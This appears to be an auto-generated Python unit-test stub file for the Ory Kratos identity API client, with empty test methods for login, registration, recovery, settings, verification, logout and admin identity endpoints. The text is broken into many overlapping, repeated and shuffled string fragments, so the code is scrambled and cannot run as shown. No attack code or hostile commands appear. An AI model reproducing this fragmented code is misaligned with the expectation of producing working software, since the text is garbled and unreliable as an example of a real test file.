"Generated by: https://openapi-generator.tech \"\"\" import unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api", "for admin_list_identities List Identities # noqa: E501 \"\"\" pass def", "noqa: E501 The version of the OpenAPI document: v0.7.0-alpha.1 Contact:", "case for admin_list_identities List Identities # noqa: E501 \"\"\" pass", "# noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test case for", "without prior authorization. To protect the administative API port you", "# noqa: E501 \"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test case for", "an Identity # noqa: E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test", "pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize Login Flow", "pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser Perform Logout for", "def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login Flow for", "Get Settings Flow # noqa: E501 \"\"\" pass def test_get_self_service_verification_flow(self):", "\"\"\" pass def test_admin_get_identity(self): \"\"\"Test case for admin_get_identity Get an", "case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers # noqa:", "case for submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services, Apps, ...", "for admin_update_identity Update an Identity # noqa: E501 \"\"\" pass", "noqa: E501 \"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow", "Clients # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case", "pass def test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow Get Recovery Flow", "V0alpha1Api # noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\"", "def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for", "a Recovery Link # noqa: E501 \"\"\" pass def test_admin_delete_identity(self):", "initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers # noqa: E501 \"\"\"", "TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\" def setUp(self): self.api = V0alpha1Api()", "capable of authorizing incoming requests. # noqa: E501 The version", "test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize Login Flow for Browsers", "ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501 class TestV0alpha1Api(unittest.TestCase):", "\"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get Settings", "the administative API port you should use something like Nginx,", "def test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow Get Registration Flow #", "pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow Complete Recovery Flow", "\"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow Get Verification", "Verification Flow for Browser Clients # noqa: E501 \"\"\" pass", "Flow # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case", "test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow Submit a Login Flow #", "def test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow Get Recovery Flow #", "pass def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List Identities #", "Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test", "Settings Flow # noqa: E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test", "version of the OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL> Generated by:", "test_admin_get_identity(self): \"\"\"Test case for admin_get_identity Get an Identity # noqa:", "pass def test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow Get Registration Flow", "case for initialize_self_service_login_flow_for_browsers Initialize Login Flow for Browsers # noqa:", "# noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for", "protect the administative API port you should use something like", "https://openapi-generator.tech \"\"\" import unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api", "E501 \"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit", "admin_update_identity Update an Identity # noqa: E501 \"\"\" pass def", "Submit a Login Flow # noqa: E501 \"\"\" pass def", "noqa: E501 \"\"\" pass def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities", "pass def test_to_session(self): \"\"\"Test case for to_session Check Who the", "Initialize Login Flow for APIs, Services, Apps, ... # noqa:", "E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize", "while administrative APIs should never be exposed without prior authorization.", "initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs, Services, Apps, ... #", "\"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize Login Flow for Browsers #", "Initialize Recovery Flow for Browsers # noqa: E501 \"\"\" pass", "E501 \"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow Get", "pass def test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow Get Verification Flow", "# noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for", "face the public internet without any protection while administrative APIs", "\"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow Complete Recovery", "Flow for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self):", "pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link Create a Recovery", "\"\"\"Test case for admin_get_identity Get an Identity # noqa: E501", "noqa: E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity", "test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow Get Login Flow # noqa:", "for get_self_service_verification_flow Get Verification Flow # noqa: E501 \"\"\" pass", "\"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity Delete an", "Settings Flow for APIs, Services, Apps, ... # noqa: E501", "a Logout URL for Browsers # noqa: E501 \"\"\" pass", "# noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\" def", "def test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\" pass def test_get_self_service_error(self):", "noqa: E501 \"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow", "\"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login Flow for APIs, Services,", "Documentation for all public and administrative Ory Kratos APIs. Public", "other technology capable of authorizing incoming requests. # noqa: E501", "Identity # noqa: E501 \"\"\" pass def test_admin_list_identities(self): \"\"\"Test case", "E501 \"\"\" pass def test_to_session(self): \"\"\"Test case for to_session Check", "APIs should never be exposed without prior authorization. To protect", "pass def test_get_self_service_error(self): \"\"\"Test case for get_self_service_error Get Self-Service Errors", "Get Login Flow # noqa: E501 \"\"\" pass def test_get_self_service_recovery_flow(self):", "To # noqa: E501 \"\"\" pass if __name__ == '__main__':", "\"\"\"Test case for submit_self_service_settings_flow Complete Settings Flow # noqa: E501", "case for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs, Services, Apps,", "Recovery Flow for APIs, Services, Apps, ... # noqa: E501", "case for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for Browsers # noqa:", "test_to_session(self): \"\"\"Test case for to_session Check Who the Current HTTP", "for create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers # noqa:", "noqa: E501 \"\"\" pass def test_to_session(self): \"\"\"Test case for to_session", "for get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test case for get_self_service_error", "\"\"\"Test case for to_session Check Who the Current HTTP Session", "def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for", "# noqa: E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for", "Login Flow for Browsers # noqa: E501 \"\"\" pass def", "case for admin_update_identity Update an Identity # noqa: E501 \"\"\"", "\"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize Registration", "pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create a Logout", "initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for Browser Clients # noqa: E501", "def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update an Identity #", "Flow for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self):", "test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create a Logout URL for", "case for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for APIs, Services, Apps,", "E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity", "an Identity # noqa: E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test", "def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create an Identity #", "for admin_create_self_service_recovery_link Create a Recovery Link # noqa: E501 \"\"\"", "E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize", "or any other technology capable of authorizing incoming requests. #", "Recovery Flow for Browsers # noqa: E501 \"\"\" pass def", "def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize Login Flow for", "E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize", "for admin_create_identity Create an Identity # noqa: E501 \"\"\" pass", "\"\"\" pass def test_to_session(self): \"\"\"Test case for to_session Check Who", "Recovery Flow # noqa: E501 \"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test", "Initialize Registration Flow for APIs, Services, Apps, ... # noqa:", "\"\"\"Test case for admin_create_identity Create an Identity # noqa: E501", "\"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser Perform Logout", "class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\" def setUp(self): self.api =", "for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test", "something like Nginx, Ory Oathkeeper, or any other technology capable", "Initialize Login Flow for Browsers # noqa: E501 \"\"\" pass", "Flow # noqa: E501 \"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case", "case for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for Browser Clients #", "test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for Browsers", "Browser Clients # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test", "# noqa: E501 \"\"\" pass def test_get_json_schema(self): \"\"\"Test case for", "# noqa: E501 \"\"\" pass def test_admin_list_identities(self): \"\"\"Test case for", "\"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow Get Login", "Self-Service Errors # noqa: E501 \"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test", "\"\"\"Test case for submit_self_service_logout_flow Complete Self-Service Logout # noqa: E501", "test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow Complete Settings Flow # noqa:", "admin_get_identity Get an Identity # noqa: E501 \"\"\" pass def", "def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for", "import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501 class", "E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self):", "administrative APIs should never be exposed without prior authorization. To", "def setUp(self): self.api = V0alpha1Api() # noqa: E501 def tearDown(self):", "submit_self_service_login_flow Submit a Login Flow # noqa: E501 \"\"\" pass", "Flow for Browser Clients # noqa: E501 \"\"\" pass def", "for submit_self_service_verification_flow Complete Verification Flow # noqa: E501 \"\"\" pass", "initialize_self_service_login_flow_without_browser Initialize Login Flow for APIs, Services, Apps, ... #", "case for submit_self_service_login_flow Submit a Login Flow # noqa: E501", "test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update an Identity # noqa:", "get_self_service_registration_flow Get Registration Flow # noqa: E501 \"\"\" pass def", "Registration Flow for Browsers # noqa: E501 \"\"\" pass def", "test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create an Identity # noqa:", "\"\"\"Test case for submit_self_service_login_flow Submit a Login Flow # noqa:", "E501 \"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow Complete", "for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test", "pass def test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\" pass def", "authorizing incoming requests. # noqa: E501 The version of the", "\"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers", "unit test stubs\"\"\" def setUp(self): self.api = V0alpha1Api() # noqa:", "def test_admin_get_identity(self): \"\"\"Test case for admin_get_identity Get an Identity #", "test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for Browsers", "\"\"\"Test case for get_self_service_error Get Self-Service Errors # noqa: E501", "technology capable of authorizing incoming requests. # noqa: E501 The", "Verification Flow # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test", "E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update", "# noqa: E501 \"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test case for", "Flow # noqa: E501 \"\"\" pass def test_to_session(self): \"\"\"Test case", "Get Self-Service Errors # noqa: E501 \"\"\" pass def test_get_self_service_login_flow(self):", "noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers", "incoming requests. # noqa: E501 The version of the OpenAPI", "def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create", "List Identities # noqa: E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test", "Registration Flow for APIs, Services, Apps, ... # noqa: E501", "\"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs, Services,", "Current HTTP Session Belongs To # noqa: E501 \"\"\" pass", "pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow", "# noqa: E501 \"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test case for", "test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List Identities # noqa: E501", "Public APIs can face the public internet without any protection", "internet without any protection while administrative APIs should never be", "... # noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case", "HTTP Session Belongs To # noqa: E501 \"\"\" pass if", "E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test case for admin_get_identity Get", "case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for Browsers # noqa:", "case for submit_self_service_logout_flow Complete Self-Service Logout # noqa: E501 \"\"\"", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self):", "without any protection while administrative APIs should never be exposed", "and administrative Ory Kratos APIs. Public and administrative APIs are", "Ory Kratos APIs. Public and administrative APIs are exposed on", "Complete Recovery Flow # noqa: E501 \"\"\" pass def test_submit_self_service_registration_flow(self):", "Who the Current HTTP Session Belongs To # noqa: E501", "be exposed without prior authorization. To protect the administative API", "on different ports. Public APIs can face the public internet", "\"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs, Services,", "Errors # noqa: E501 \"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test case", "for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers # noqa: E501", "Registration Flow # noqa: E501 \"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test", "noqa: E501 \"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow", "for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test", "E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize", "initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for Browsers # noqa: E501 \"\"\"", "def test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow Complete Settings Flow #", "case for get_self_service_login_flow Get Login Flow # noqa: E501 \"\"\"", "\"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize Recovery", "\"\"\"Test case for get_self_service_verification_flow Get Verification Flow # noqa: E501", "case for admin_get_identity Get an Identity # noqa: E501 \"\"\"", "test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test", "\"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow Get Registration", "for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs, Services, Apps, ...", "noqa: E501 \"\"\" pass def test_get_json_schema(self): \"\"\"Test case for get_json_schema", "Browsers # noqa: E501 \"\"\" pass def test_get_json_schema(self): \"\"\"Test case", "Flow for APIs, Services, Apps, ... # noqa: E501 \"\"\"", "\"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize Registration", "submit_self_service_settings_flow Complete Settings Flow # noqa: E501 \"\"\" pass def", "pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete Verification Flow", "get_self_service_settings_flow Get Settings Flow # noqa: E501 \"\"\" pass def", "get_self_service_verification_flow Get Verification Flow # noqa: E501 \"\"\" pass def", "pass def test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow Complete Settings Flow", "noqa: E501 \"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow", "test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow Get Verification Flow # noqa:", "pass def test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity Delete an Identity", "pass def test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow Get Login Flow", "pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow", "Recovery Flow # noqa: E501 \"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test", "# noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for", "noqa: E501 \"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow", "def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self):", "case for to_session Check Who the Current HTTP Session Belongs", "E501 \"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow Get", "and administrative APIs are exposed on different ports. Public APIs", "admin_create_self_service_recovery_link Create a Recovery Link # noqa: E501 \"\"\" pass", "authorization. To protect the administative API port you should use", "def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for", "The version of the OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL> Generated", "pass def test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get Settings Flow", "for submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services, Apps, ... #", "Flow # noqa: E501 \"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test case", "Flow # noqa: E501 \"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test case", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self):", "Flow # noqa: E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case", "# noqa: E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for", "test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for Browser", "submit_self_service_registration_flow Submit a Registration Flow # noqa: E501 \"\"\" pass", "noqa: E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link", "Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case", "for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for Browsers # noqa: E501", "E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser Perform", "pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize Verification Flow", "Ory Oathkeeper, or any other technology capable of authorizing incoming", "setUp(self): self.api = V0alpha1Api() # noqa: E501 def tearDown(self): pass", "for admin_delete_identity Delete an Identity # noqa: E501 \"\"\" pass", "\"\"\"V0alpha1Api unit test stubs\"\"\" def setUp(self): self.api = V0alpha1Api() #", "pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow", "noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser", "all public and administrative Ory Kratos APIs. Public and administrative", "v0.7.0-alpha.1 Contact: <EMAIL> Generated by: https://openapi-generator.tech \"\"\" import unittest import", "get_self_service_error Get Self-Service Errors # noqa: E501 \"\"\" pass def", "for all public and administrative Ory Kratos APIs. Public and", "for get_self_service_registration_flow Get Registration Flow # noqa: E501 \"\"\" pass", "\"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize Verification", "for initialize_self_service_login_flow_without_browser Initialize Login Flow for APIs, Services, Apps, ...", "# noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for", "Identity # noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case", "\"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow Complete Self-Service", "Complete Self-Service Logout # noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self):", "Logout URL for Browsers # noqa: E501 \"\"\" pass def", "Nginx, Ory Oathkeeper, or any other technology capable of authorizing", "E501 \"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get", "Flow # noqa: E501 \"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test case", "E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow Submit", "\"\"\"Test case for get_self_service_registration_flow Get Registration Flow # noqa: E501", "pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow", "E501 \"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow Complete", "E501 \"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow Get", "def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit a Registration Flow", "can face the public internet without any protection while administrative", "Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case", "Complete Verification Flow # noqa: E501 \"\"\" pass def test_to_session(self):", "... # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case", "\"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for Browser Clients", "E501 The version of the OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL>", "noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\" def setUp(self):", "<EMAIL> Generated by: https://openapi-generator.tech \"\"\" import unittest import ory_kratos_client from", "\"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow Submit a", "API port you should use something like Nginx, Ory Oathkeeper,", "API Documentation for all public and administrative Ory Kratos APIs.", "submit_self_service_verification_flow Complete Verification Flow # noqa: E501 \"\"\" pass def", "pass def test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow Complete Self-Service Logout", "OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL> Generated by: https://openapi-generator.tech \"\"\" import", "pass def test_admin_get_identity(self): \"\"\"Test case for admin_get_identity Get an Identity", "Initialize Recovery Flow for APIs, Services, Apps, ... # noqa:", "for to_session Check Who the Current HTTP Session Belongs To", "for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for APIs, Services, Apps, ...", "case for initialize_self_service_login_flow_without_browser Initialize Login Flow for APIs, Services, Apps,", "submit_self_service_logout_flow Complete Self-Service Logout # noqa: E501 \"\"\" pass def", "requests. # noqa: E501 The version of the OpenAPI document:", "\"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs, Services,", "... # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case", "# noqa: E501 \"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test case for", "case for submit_self_service_settings_flow Complete Settings Flow # noqa: E501 \"\"\"", "Create a Recovery Link # noqa: E501 \"\"\" pass def", "Complete Settings Flow # noqa: E501 \"\"\" pass def test_submit_self_service_verification_flow(self):", "get_self_service_recovery_flow Get Recovery Flow # noqa: E501 \"\"\" pass def", "noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers", "of authorizing incoming requests. # noqa: E501 The version of", "# noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for", "E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize", "case for get_self_service_registration_flow Get Registration Flow # noqa: E501 \"\"\"", "Get Recovery Flow # noqa: E501 \"\"\" pass def test_get_self_service_registration_flow(self):", "pass def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create an Identity", "\"\"\"Test case for submit_self_service_registration_flow Submit a Registration Flow # noqa:", "def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for", "Get Verification Flow # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self):", "\"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for Browsers #", "# noqa: E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case for", "To protect the administative API port you should use something", "def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link Create a Recovery Link", "Submit a Registration Flow # noqa: E501 \"\"\" pass def", "E501 \"\"\" pass def test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\"", "for get_self_service_login_flow Get Login Flow # noqa: E501 \"\"\" pass", "different ports. Public APIs can face the public internet without", "\"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login", "Flow for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self):", "\"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize Verification", "E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize", "import unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa:", "Initialize Settings Flow for APIs, Services, Apps, ... # noqa:", "case for admin_create_self_service_recovery_link Create a Recovery Link # noqa: E501", "Create an Identity # noqa: E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self):", "Get Registration Flow # noqa: E501 \"\"\" pass def test_get_self_service_settings_flow(self):", "# noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for", "ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit", "Verification Flow for APIs, Services, Apps, ... # noqa: E501", "test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow Complete Recovery Flow # noqa:", "test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit a Registration Flow #", "for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test", "Ory Kratos API Documentation for all public and administrative Ory", "a Login Flow 